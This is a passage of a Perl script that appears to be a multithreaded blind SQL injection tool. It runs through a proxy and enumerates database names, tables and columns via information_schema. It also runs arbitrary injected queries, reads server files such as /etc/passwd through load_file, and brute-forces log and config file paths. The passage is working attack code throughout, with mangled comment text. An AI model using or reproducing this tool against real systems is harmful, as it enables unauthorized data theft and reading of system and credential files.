  2089.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2090.           print "Count DB in information_schema.schemata  [length]:" .  $bl_lenght . "\n";
  2091.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2092.                if ($bl_mode==0) {
  2093.                    $bl_table_number_NIS .= get_res_count();
  2094.                } else {
  2095.                    $bl_table_number_NIS .= get_res_count1();
  2096.                }
  2097.                 print $bl_table_number_NIS . "\r";
  2098.                 sleep $pause;
  2099.           }
  2100.           print "\n------------------------------------------------------\n";
  2101.           print "Count DB in information_schema.schemata [value]:" . $bl_table_number_NIS . "\n";
  2102.           print "--------------------------------------------------------\n";
  2103.      } else {
  2104.           print "\n------------------------------------------------------\n";
  2105.           print "Cant't get data...\n";
  2106.           print "------------------------------------------------------\n";
  2107.      }
  2108.      $time = localtime;
  2109.      print $time . "\n";
  2110.      print "-----------------------------------\n";
  2111.      ## start from2 ##
  2112.      print FILE1  "-----------------------------------------\n";
  2113.      print FILE1  "DB in information_schema.schemata - $bl_table_number_NIS\n";
  2114.      print FILE1  "-----------------------------------------\n";
  2115.      print "Normal MODE - records > 10\n";
  2116.      print "Fast MODE - records <= 10\n";
  2117.      print "-----------------------------------------\n";
  2118.      $thr = $kol_threads; # ???-?? ???????
  2119.      $num = -1; # ?? ????????
  2120.      ## end from2
  2121.      print "Request method - $method\n";
  2122.      print "Threads - $kol_threads\n";
  2123.      print "Proxy - $proxy_message\n";
  2124.      print "----------------------\n";
  2125.      TABLES:
  2126.      $time = localtime;
  2127.      print $time . "\n";
  2128.      print "-----------------------------------\n";
  2129.      # ?????? DB #
  2130.      $bl_lenght = "";
  2131.      $ii = 0;
  2132.      $s = 0;
  2133.      $mflag = 0;
  2134.      print "-----------------------------------\n";
  2135.      for(0..$thr) {
  2136.          $trl[$_] = threads->create(\&gets102111);
  2137.      }
  2138.      for(0..$thr) {
  2139.          $trl[$_]->join;
  2140.      }
  2141.      sub gets102111 {
  2142.         $| = 1;
  2143.         while ($num < $bl_table_number_NIS) {
  2144.             { lock($num);
  2145.             $num++; }
  2146.             $sss = $num;
  2147.             $bl_current = "(select" . $bl_plus .  "schema_name" . $bl_plus . "from" . $bl_plus . "information_schema.schemata" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2148.             if ($bl_mode==0) {
  2149.                    $bl_lenght = len_check();
  2150.             } else {
  2151.                    $bl_lenght = len_check1();
  2152.             }
  2153.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2154.                  print "\nDB limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2155.                  if ($mflag == 1) {
  2156.                      ############################################################
  2157.                      %aa = ();
  2158.                      $aa = gets1000();
  2159.                      $data1 = "";
  2160.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2161.                      #############################################################
  2162.                  } else {
  2163.                    $data1 = "";
  2164.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2165.                     if ($bl_mode==0) {
  2166.                          $data1 .= chr(get_res_normal());
  2167.                     } else {
  2168.                          $data1 .= chr(get_res_normal1());
  2169.                     }
  2170.                       print $data1 . "\r";
  2171.                    }
  2172.                  }
  2173.                  print "\n-----------------------------------\n";
  2174.                  print "  ---> DB limit $sss,1: " . $data1 . "\n";
  2175.                  print "-----------------------------------\n";
  2176.                  print FILE1 "  ---> DB limit $sss,1: " . $data1 . "\n";
  2177.                  $data = "";
  2178.             }
  2179.             sleep $pause;
  2180.         }
  2181.     }
  2182.     print "----------\n";
  2183.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2184.     close(FILE1);
  2185.     goto START10;
  2186. } # end DB names
  2187. # Blind tables from DB names
  2188. if ($choice==3) {
  2189.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2190.      $bl_table_number_NIS = "";
  2191.      print "-----------------------------------------\n";
  2192.      print "Enter the DB-name: ";
  2193.      $choice = <STDIN>;
  2194.      chomp $choice;
  2195.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2196.      print "DB-name: $choice\n";
  2197.      print "----------\n";
  2198.      $choice1 = ascii_to_hex $choice;
  2199.      ## ???????? ##
  2200.      $bl_lenght = "";
  2201.      $ii = 0;
  2202.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
  2203.             if ($bl_mode==0) {
  2204.                    $bl_lenght = len_check();
  2205.             } else {
  2206.                    $bl_lenght = len_check1();
  2207.             }
  2208.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2209.           print "Tables in DB [$choice]: $tab_num1 [length]:" .  $bl_lenght . "\n";
  2210.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2211.                if ($bl_mode==0) {
  2212.                    $bl_table_number_NIS .= get_res_count();
  2213.                } else {
  2214.                    $bl_table_number_NIS .= get_res_count1();
  2215.                }
  2216.                 print $bl_table_number_NIS . "\r";
  2217.                 sleep $pause;
  2218.           }
  2219.           print "\n------------------------------------------------------\n";
  2220.           print "Tables in DB [$choice]: $tab_num1 [value]:" . $bl_table_number_NIS . "\n";
  2221.           print "--------------------------------------------------------\n";
  2222.      } else {
  2223.           print "\n------------------------------------------------------\n";
  2224.           print "Cant't get data...\n";
  2225.           print "------------------------------------------------------\n";
  2226.      }
  2227.      $time = localtime;
  2228.      print $time . "\n";
  2229.      print "-----------------------------------\n";
  2230.      ## start from2 ##
  2231.      print FILE1  "-----------------------------------------\n";
  2232.      print FILE1  "Tables in DB [$choice]:- $bl_table_number_NIS\n";
  2233.      print FILE1  "-----------------------------------------\n";
  2234.      print "Normal MODE - records > 10\n";
  2235.      print "Fast MODE - records <= 10\n";
  2236.      print "-----------------------------------------\n";
  2237.      $thr = $kol_threads; # ???-?? ???????
  2238.      $num = -1; # ?? ????????
  2239.      ## end from2
  2240.      print "Request method - $method\n";
  2241.      print "Threads - $kol_threads\n";
  2242.      print "Proxy - $proxy_message\n";
  2243.      print "----------------------\n";
  2244.      TABLES:
  2245.      $time = localtime;
  2246.      print $time . "\n";
  2247.      print "-----------------------------------\n";
  2248.      # ?????? DB #
  2249.      $bl_lenght = "";
  2250.      $ii = 0;
  2251.      $s = 0;
  2252.      $mflag = 0;
  2253.      print "-----------------------------------\n";
  2254.      for(0..$thr) {
  2255.          $trl[$_] = threads->create(\&gets109999);
  2256.      }
  2257.      for(0..$thr) {
  2258.          $trl[$_]->join;
  2259.      }
  2260.      sub gets109999 {
  2261.         $| = 1;
  2262.         while ($num < $bl_table_number_NIS) {
  2263.             { lock($num);
  2264.             $num++; }
  2265.             $sss = $num;
  2266.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $bl_plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2267.             if ($bl_mode==0) {
  2268.                    $bl_lenght = len_check();
  2269.             } else {
  2270.                    $bl_lenght = len_check1();
  2271.             }
  2272.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2273.                  print "\nTable limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2274.                  if ($mflag == 1) {
  2275.                      ############################################################
  2276.                      %aa = ();
  2277.                      $aa = gets1000();
  2278.                      $data1 = "";
  2279.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2280.                      #############################################################
  2281.                  } else {
  2282.                    $data1 = "";
  2283.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2284.                     if ($bl_mode==0) {
  2285.                          $data1 .= chr(get_res_normal());
  2286.                     } else {
  2287.                          $data1 .= chr(get_res_normal1());
  2288.                     }
  2289.                       print $data1 . "\r";
  2290.                    }
  2291.                  }
  2292.                  print "\n-----------------------------------\n";
  2293.                  print "  ---> Table limit $sss,1: " . $data1 . "\n";
  2294.                  print "-----------------------------------\n";
  2295.                  print FILE1 "  ---> Table limit $sss,1: " . $data1 . "\n";
  2296.                  $data = "";
  2297.             }
  2298.             sleep $pause;
  2299.         }
  2300.     }
  2301.     print "----------\n";
  2302.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2303.     close(FILE1);
  2304.     goto START10;
  2305. } # end tables from DB names
  2306. #######################################################################################################################################################################################
  2307. # Blind some query
  2308. if ($choice==4) {
  2309.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2310.      $bl_table_number_NIS = "";
  2311.      $choice100 =  "";
  2312.      $choice200 =  "";
  2313.      $choice300 = "";
  2314.   if(!$bl_your_query) {
  2315.      print "\$bl_your_query is empty in code\n";
  2316.      print "Enter your query, example - concat_ws(0x3a,table_schema,table_name)\n\n";
  2317.      $choice100 = <STDIN>;
  2318.      chomp  $choice100;
  2319.      print "\n\nEnter condition, without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273 (if NOT- press ENTER):\n\n";
  2320.      $choice200 = <STDIN>;
  2321.      chomp  $choice200;
  2322.   } else {
  2323.      $choice100 =  $bl_your_query;
  2324.      $choice200 =  $bl_from;
  2325.   }
  2326.      $choice300 = $choice100 . $choice200;
  2327.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
  2328.      print "your query: (select(". $choice100 . ")" . $choice200 . ")\n";
  2329.      print "---------------------------------------------------------------------------------------------------------------------------------------\n";
  2330.      $bl_lenght = "";
  2331.      $ii = 0;
  2332.      $bl_current = "(select(count(" . $choice100 . "))" . $choice200 . ")";
  2333.             if ($bl_mode==0) {
  2334.                    $bl_lenght = len_check();
  2335.             } else {
  2336.                    $bl_lenght = len_check1();
  2337.             }
  2338.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2339.           print "Count records for your answer[length]:" .  $bl_lenght . "\n";
  2340.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2341.                if ($bl_mode==0) {
  2342.                    $bl_table_number_NIS .= get_res_count();
  2343.                } else {
  2344.                    $bl_table_number_NIS .= get_res_count1();
  2345.                }
  2346.                 print $bl_table_number_NIS . "\r";
  2347.                 sleep $pause;
  2348.           }
  2349.           print "\n------------------------------------------------------\n";
  2350.           print "Count records for your answer[value]:" . $bl_table_number_NIS . "\n";
  2351.           print "--------------------------------------------------------\n";
  2352.      } else {
  2353.           print "\n------------------------------------------------------\n";
  2354.           print "Cant't get data...\n";
  2355.           print "------------------------------------------------------\n";
  2356.      }
  2357.      ## ???????? ##
  2358.      $time = localtime;
  2359.      print $time . "\n";
  2360.      print "-----------------------------------\n";
  2361.      $thr = $kol_threads; # ???-?? ???????
  2362.      if($bl_table_number_NIS == 1) {
  2363.         $num = 0; # ?? ????????
  2364.      } else {$num = -1}
  2365.      print "Request method - $method\n";
  2366.      print "Threads - $kol_threads\n";
  2367.      print "Proxy - $proxy_message\n";
  2368.      print "----------------------\n";
  2369.      $bl_lenght = "";
  2370.      $ii = 0;
  2371.      $s = 0;
  2372.      $mflag = 0;
  2373.      print "-----------------------------------\n";
  2374.      for(0..$thr) {
  2375.          $trl[$_] = threads->create(\&gets102222);
  2376.      }
  2377.      for(0..$thr) {
  2378.          $trl[$_]->join;
  2379.      }
  2380.      sub gets102222 {
  2381.         $| = 1;
  2382.         while ($num < $bl_table_number_NIS) {
  2383.             { lock($num);
  2384.             $num++; }
  2385.             $sss = $num;
  2386.             if ($bl_table_number_NIS>1){
  2387.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2388.             } else {
  2389.                $bl_current = "(select(" . $choice100 . ")" . $choice200 . ")";
  2390.             }
  2391.             if ($bl_mode==0) {
  2392.                    $bl_lenght = len_check();
  2393.             } else {
  2394.                    $bl_lenght = len_check1();
  2395.             }
  2396.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2397.                  print "\nAnswer[length]:" .  $bl_lenght . "\n";
  2398.                  if ($mflag == 1) {
  2399.                      ############################################################
  2400.                      %aa = ();
  2401.                      $aa = gets1000();
  2402.                      $data1 = "";
  2403.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2404.                      #############################################################
  2405.                  } else {
  2406.                    $data1 = "";
  2407.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2408.                     if ($bl_mode==0) {
  2409.                          $data1 .= chr(get_res_normal());
  2410.                     } else {
  2411.                          $data1 .= chr(get_res_normal1());
  2412.                     }
  2413.                       print $data1 . "\r";
  2414.                    }
  2415.                  }
  2416.                  print "\n-----------------------------------\n";
  2417.                  print " Answer limit $sss,1 --->  " . $data1 . "\n";
  2418.                  print "-----------------------------------\n";
  2419.                  print FILE1 " Answer limit $sss,1 ---> " . $data1 . "\n";
  2420.                  $data = "";
  2421.             }
  2422.             sleep $pause;
  2423.         }
  2424.     }
  2425.     print "----------\n";
  2426.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2427.     close(FILE1);
  2428.     goto START10;
  2429. } # end some query
  2430. #########################################################################################################################################################
  2431. # Blind columns from tables from DB names
  2432. if ($choice==5) {
  2433.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2434.      $bl_table_number_NIS = "";
  2435.      print "-----------------------------------------\n";
  2436.      print "Enter the DB-name: ";
  2437.      $choice = <STDIN>;
  2438.      chomp $choice;
  2439.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2440.      print "DB-name: $choice\n";
  2441.      print "----------\n";
  2442.      $choice1 = ascii_to_hex $choice;
  2443.      print "-----------------------------------------\n";
  2444.      print "Enter the TABLE-name: ";
  2445.      $choice2 = <STDIN>;
  2446.      chomp $choice2;
  2447.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  2448.      print "TABLE-name: $choice2\n";
  2449.      print "----------\n";
  2450.      $choice3 = ascii_to_hex $choice2;
  2451.      ## ???????? ##
  2452.      $bl_lenght = "";
  2453.      $ii = 0;
  2454.      $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
  2455.             if ($bl_mode==0) {
  2456.                    $bl_lenght = len_check();
  2457.             } else {
  2458.                    $bl_lenght = len_check1();
  2459.             }
  2460.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2461.           print "Columns in [$choice.$choice2] [length]:" .  $bl_lenght . "\n";
  2462.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2463.                if ($bl_mode==0) {
  2464.                    $bl_table_number_NIS .= get_res_count();
  2465.                } else {
  2466.                    $bl_table_number_NIS .= get_res_count1();
  2467.                }
  2468.                 print $bl_table_number_NIS . "\r";
  2469.                 sleep $pause;
  2470.           }
  2471.           print "\n------------------------------------------------------\n";
  2472.           print "Columns in [$choice.$choice2] [value]:" . $bl_table_number_NIS . "\n";
  2473.           print "--------------------------------------------------------\n";
  2474.      } else {
  2475.           print "\n------------------------------------------------------\n";
  2476.           print "Cant't get data...\n";
  2477.           print "------------------------------------------------------\n";
  2478.      }
  2479.      $time = localtime;
  2480.      print $time . "\n";
  2481.      print "-----------------------------------\n";
  2482.      ## start from2 ##
  2483.      print FILE1  "-----------------------------------------\n";
  2484.      print FILE1  "Columns in [$choice.$choice2]: - $bl_table_number_NIS\n";
  2485.      print FILE1  "-----------------------------------------\n";
  2486.      print "Normal MODE - records > 10\n";
  2487.      print "Fast MODE - records <= 10\n";
  2488.      print "-----------------------------------------\n";
  2489.      $thr = $kol_threads; # ???-?? ???????
  2490.      $num = -1; # ?? ????????
  2491.      ## end from2
  2492.      print "Request method - $method\n";
  2493.      print "Threads - $kol_threads\n";
  2494.      print "Proxy - $proxy_message\n";
  2495.      print "----------------------\n";
  2496.      TABLES:
  2497.      $time = localtime;
  2498.      print $time . "\n";
  2499.      print "-----------------------------------\n";
  2500.      # ?????? DB #
  2501.      $bl_lenght = "";
  2502.      $ii = 0;
  2503.      $s = 0;
  2504.      $mflag = 0;
  2505.      print "-----------------------------------\n";
  2506.      for(0..$thr) {
  2507.          $trl[$_] = threads->create(\&gets102333);
  2508.      }
  2509.      for(0..$thr) {
  2510.          $trl[$_]->join;
  2511.      }
  2512.      sub gets102333 {
  2513.         $| = 1;
  2514.         while ($num < $bl_table_number_NIS) {
  2515.             { lock($num);
  2516.             $num++; }
  2517.             $sss = $num;
  2518.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2519.             if ($bl_mode==0) {
  2520.                    $bl_lenght = len_check();
  2521.             } else {
  2522.                    $bl_lenght = len_check1();
  2523.             }
  2524.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2525.                  print "\nColumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2526.                  if ($mflag == 1) {
  2527.                      ############################################################
  2528.                      %aa = ();
  2529.                      $aa = gets1000();
  2530.                      $data1 = "";
  2531.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2532.                      #############################################################
  2533.                  } else {
  2534.                    $data1 = "";
  2535.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2536.                     if ($bl_mode==0) {
  2537.                          $data1 .= chr(get_res_normal());
  2538.                     } else {
  2539.                          $data1 .= chr(get_res_normal1());
  2540.                     }
  2541.                       print $data1 . "\r";
  2542.                    }
  2543.                  }
  2544.                  print "\n-----------------------------------\n";
  2545.                  print "  ---> Column limit $sss,1: " . $data1 . "\n";
  2546.                  print "-----------------------------------\n";
  2547.                  print FILE1 "  ---> Column limit $sss,1: " . $data1 . "\n";
  2548.                  $data = "";
  2549.             }
  2550.             sleep $pause;
  2551.         }
  2552.     }
  2553.     print "----------\n";
  2554.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2555.     close(FILE1);
  2556.     goto START10;
  2557. } # end columns from tables from DB names
  2558. # blind LOAD_FILE log/conf BRUTE
  2559. if ($choice==7) {
  2560.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2561.        $bl_lenght=0;  
  2562.        print "   Brute log/conf files\n";
  2563.        print "   -------------\n";
  2564.        print FILE1 "   Brute log/conf files\n";
  2565.        print FILE1 "   -------------\n";
  2566.        open(FILE, "<", $lrl_list);
  2567.        while(<FILE>) {
  2568.          chomp;
  2569.          push(@lrl_list, $_);
  2570.        }
  2571.        close(FILE);
  2572.        $size = 0;
  2573.        $size = @lrl_list;
  2574.        print "File: $lrl_list\n";
  2575.        print "Paths: $size\n";
  2576.        print "-------------\n";
  2577.        print "Request method - $method\n";
  2578.        print "Threads - $kol_threads\n";
  2579.        print "Proxy - $proxy_message\n";
  2580.        print "----------------------\n";
  2581.        $thr = $kol_threads; # ???-?? ???????
  2582.        $num = -1; # ?? ????????
  2583.        for(0..$thr) {
  2584.             $trl[$_] = threads->create(\&gets996655);
  2585.        }
  2586.        for(0..$thr) {
  2587.             $trl[$_]->join;
  2588.        }
  2589.        sub gets996655 {
  2590.             $| = 1;
  2591.             while ($num<$size) {
  2592.                { lock($num);
  2593.                $num++; }
  2594.                $choice1111  = '/'.$lrl_list[$num];
  2595.                $choice2222 = ascii_to_hex $choice1111;
  2596.                print $choice1111 . "\n";
  2597.                $bl_lenght = "";
  2598.                $bl_current = "length(load_file(" . $choice2222 .  "))";
  2599.                if ($bl_mode==0) {
  2600.                    $bl_lenght = len_check();
  2601.                } else {
  2602.                    $bl_lenght = len_check1();
  2603.                }
  2604.                if  (($bl_lenght >= 2)) {
  2605.                     print "   ---> " . $choice1111 . "\n";
  2606.                     print FILE1 "  "  . $choice1111 . "\n";
  2607.                }
  2608.                $bl_lenght=0;
  2609.                print $num . "\r";
  2610.                sleep $pause;
  2611.  
  2612.             }
  2613.        }
  2614.     print "----------\n";
  2615.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2616.     close(FILE1);
  2617.     goto START10;
  2618. } # end blind LOAd_FILE BRUTE
  2619. # blind LOAd_FILE
  2620. if ($choice==6) {
  2621.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2622.      $bl_table_number_NIS = "";
  2623.      print "-----------------------------------------\n";
  2624.      print "Enter file name (example: /etc/passwd): ";
  2625.      $choice = <STDIN>;
  2626.      chomp $choice;
  2627.      print "File name for read: $choice\n";
  2628.      $choice1 = ascii_to_hex $choice;
  2629.      ## ???????? ##
  2630.      $bl_lenght = "";
  2631.      $ii = 0;
  2632.      $bl_current = "length(load_file(" . $choice1 .  "))";
  2633.             if ($bl_mode==0) {
  2634.                    $bl_lenght = len_check();
  2635.             } else {
  2636.                    $bl_lenght = len_check1();
  2637.             }
  2638.      if  (($bl_lenght >= 2)) {
  2639.           print "File [$choice] size [length]:" .  $bl_lenght . "\n";
  2640.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2641.                if ($bl_mode==0) {
  2642.                    $bl_table_number_NIS .= get_res_count();
  2643.                } else {
  2644.                    $bl_table_number_NIS .= get_res_count1();
  2645.                }
  2646.                 print $bl_table_number_NIS . "\r";
  2647.                 sleep $pause;
  2648.           }
  2649.           print "\n------------------------------------------------------\n";
  2650.           print "File [$choice] size: - $bl_table_number_NIS bytes\n";
  2651.           print "--------------------------------------------------------\n";
  2652.      } else {
  2653.           print "\n------------------------------------------------------\n";
  2654.           print "Cant't get data...\n";
  2655.           print "------------------------------------------------------\n";
  2656.           close(FILE1);
  2657.           goto START10;
  2658.      }
  2659.      $time = localtime;
  2660.      print $time . "\n";
  2661.      ## start from2 ##
  2662.      print FILE1  "-----------------------------------------\n";
  2663.      print FILE1  "File [$choice] size: - $bl_table_number_NIS bytes\n";
  2664.      print FILE1  "-----------------------------------------\n";
  2665.      # ?????? ???? #
  2666.      $thr = $kol_threads; # ???-?? ???????
  2667.      $num = -1; # ?? ????????
  2668.      ## end from2
  2669.      print "Request method - $method\n";
  2670.      print "Threads - $kol_threads\n";
  2671.      print "Proxy - $proxy_message\n";
  2672.      print "----------------------\n";
  2673.      TABLES:
  2674.      $time = localtime;
  2675.      print $time . "\n";
  2676.      print "-----------------------------------\n";
  2677.      # ?????? DB #
  2678.      $bl_lenght = "";
  2679.      $ii = 0;
  2680.      $s = 0;
  2681.      $mflag = 0;
  2682.      print "-----------------------------------\n";
  2683.      $bl_current = "(load_file(" . $choice1 .  "))";
  2684.      %aa = ();
  2685.      $aa = load_file();
  2686.      $data1000 = "";
  2687.      $data1000 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2688.      print FILE1 $data1000;
  2689.      sub load_file {
  2690.          $thr = $kol_threads; # ???-?? ???????
  2691.          print "Get ALL file ($bl_table_number_NIS) or PART of file ? (1/0): ";
  2692.          $choice = <STDIN>;
  2693.          chomp $choice;
  2694.          if ($choice == 1) {
  2695.              $num = -1; # ?? ????????
  2696.          } else {
  2697.              print "Enter START byte: ";
  2698.              $choice1 = <STDIN>;
  2699.              chomp $choice1;
  2700.              $num = $choice1-2;
  2701.              print "Enter END byte: ";
  2702.              $choice2 = <STDIN>;
  2703.              chomp $choice2;
  2704.              $bl_table_number_NIS = $choice2;
  2705.              print "Dump bytes of file from [" . ($num+2) . "] to [" . ($bl_table_number_NIS) . "]\n";
  2706.          }
  2707.          print "-----------------------------------------\n";
  2708.          ## end from2
  2709.          %res1 = ();
  2710.          for(0..$thr) {
  2711.              $trl[$_] = threads->create(\&gets102444);
  2712.          }
  2713.          for(0..$thr) {
  2714.              %res1 = (%res1, %{$trl[$_]->join});
  2715.          }
  2716.          sub gets102444 {
  2717.              $data2 = "";
  2718.              $| = 1;
  2719.              while ($num < $bl_table_number_NIS) {
  2720.                    { lock($num);
  2721.                    $num++; }
  2722.                    $ii = $num;
  2723.                    if ($bl_mode==0){
  2724.                         $data2 = chr(get_res_normal());
  2725.                    } else {
  2726.                         $data2 = chr(get_res_normal1());
  2727.                    }
  2728.                    $hash1{$ii} = $data2;
  2729.                    print $data2;
  2730.              }
  2731.              return \%hash1
  2732.          }
  2733.          return \%res1;
  2734.     }
  2735.     print "----------\n";
  2736.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2737.     close(FILE1);
  2738.     goto START10;
  2739. } # end blind LOAd_FILE
  2740. if ($choice==8) {
  2741.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2742.      print "-----------------------------------\n";
  2743.      ## ???????? ##
  2744.      $bl_lenght = "";
  2745.      $ii = 0;
  2746.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61)";
  2747.             if ($bl_mode==0) {
  2748.                    $bl_lenght = len_check();
  2749.             } else {
  2750.                    $bl_lenght = len_check1();
  2751.             }
  2752.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2753.           print "Count tables NOT in information_schema [length]:" .  $bl_lenght . "\n";
  2754.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2755.                if ($bl_mode==0) {
  2756.                    $bl_table_number_NIS .= get_res_count();
  2757.                } else {
  2758.                    $bl_table_number_NIS .= get_res_count1();
  2759.                }
  2760.                 print $bl_table_number_NIS . "\r";
  2761.                 sleep $pause;
  2762.           }
  2763.           print "\n------------------------------------------------------\n";
  2764.           print "Count tables NOT in information_schema [value]:" . $bl_table_number_NIS . "\n";
  2765.           print "--------------------------------------------------------\n";
  2766.      } else {
  2767.           print "\n------------------------------------------------------\n";
  2768.           print "Cant't get data...\n";
  2769.           print "------------------------------------------------------\n";
  2770.      }
  2771.      $time = localtime;
  2772.      print $time . "\n";
  2773.      print "-----------------------------------\n";
  2774.      ## start from2 ##
  2775.      print FILE1  "-----------------------------------------\n";
  2776.      print FILE1  "Tables - $bl_table_number_NIS\n";
  2777.      print FILE1  "-----------------------------------------\n";
  2778.      print "Normal MODE - records > 10\n";
  2779.      print "Fast MODE - records <= 10\n";
  2780.      print "-----------------------------------------\n";
  2781.      print "Get ALL tables ($bl_table_number_NIS) ? (1/0): ";
  2782.      $choice = <STDIN>;
  2783.      chomp $choice;
  2784.      $thr = $kol_threads; # ???-?? ???????
  2785.      if ($choice == 1) {
  2786.           $num = -1; # ?? ????????
  2787.      } else {
  2788.           print "Enter START_position: ";
  2789.           $choice1 = <STDIN>;
  2790.           chomp $choice1;
  2791.           $num = $choice1-2;
  2792.           print "Enter END_position: ";
  2793.           $choice2 = <STDIN>;
  2794.           chomp $choice2;
  2795.           $bl_table_number_NIS = $choice2-1;
  2796.           print "Dump records from [" . ($num+2) . "] to [" . ($bl_table_number_NIS+1) . "]\n";
  2797.      }
  2798.      print "-----------------------------------------\n";
  2799.      ## end from2
  2800.      print "Request method - $method\n";
  2801.      print "Threads - $kol_threads\n";
  2802.      print "Proxy - $proxy_message\n";
  2803.      print "----------------------\n";
  2804.      TABLES:
  2805.      $time = localtime;
  2806.      print $time . "\n";
  2807.      print "-----------------------------------\n";
  2808.      # ?????? ??????? #
  2809.      $bl_lenght = "";
  2810.      $ii = 0;
  2811.      $s = 0;
  2812.      $mflag = 0;
  2813.      print "-----------------------------------\n";
  2814.      for(0..$thr) {
  2815.          $trl[$_] = threads->create(\&gets102);
  2816.      }
  2817.      for(0..$thr) {
  2818.          $trl[$_]->join;
  2819.      }
  2820.      sub gets102 {
  2821.         $| = 1;
  2822.         while ($num < $bl_table_number_NIS) {
  2823.             { lock($num);
  2824.             $num++; }
  2825.             $sss = $num;
  2826.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2827.             if ($bl_mode==0) {
  2828.                    $bl_lenght = len_check();
  2829.             } else {
  2830.                    $bl_lenght = len_check1();
  2831.             }
  2832.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2833.                  print "\ntable limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2834.                  if ($mflag == 1) {
  2835.                      ############################################################
  2836.                      %aa = ();
  2837.                      $aa = gets1000();
  2838.                      $data1 = "";
  2839.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2840.                      #############################################################
  2841.                  } else {
  2842.                    $data1 = "";
  2843.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2844.                     if ($bl_mode==0) {
  2845.                          $data1 .= chr(get_res_normal());
  2846.                     } else {
  2847.                          $data1 .= chr(get_res_normal1());
  2848.                     }
  2849.                       print $data1 . "\r";
  2850.                    }
  2851.                  }
  2852.                  print "\n-----------------------------------\n";
  2853.                  print "  ---> table limit $sss,1: " . $data1 . "\n";
  2854.                  print "-----------------------------------\n";
  2855.                  print FILE1 "  ---> table limit $sss,1: " . $data1 . "\n";
  2856.                  $data = "";
  2857.             }
  2858.             sleep $pause;
  2859.         }
  2860.     }
  2861.     print "----------\n";
  2862.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2863.     close(FILE1);
  2864.     goto START10;
  2865. }
  2866. if ($choice==9) {
  2867.     sub ascii_to_hex ($) {
  2868.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  2869.                $str = "0x" . $str;
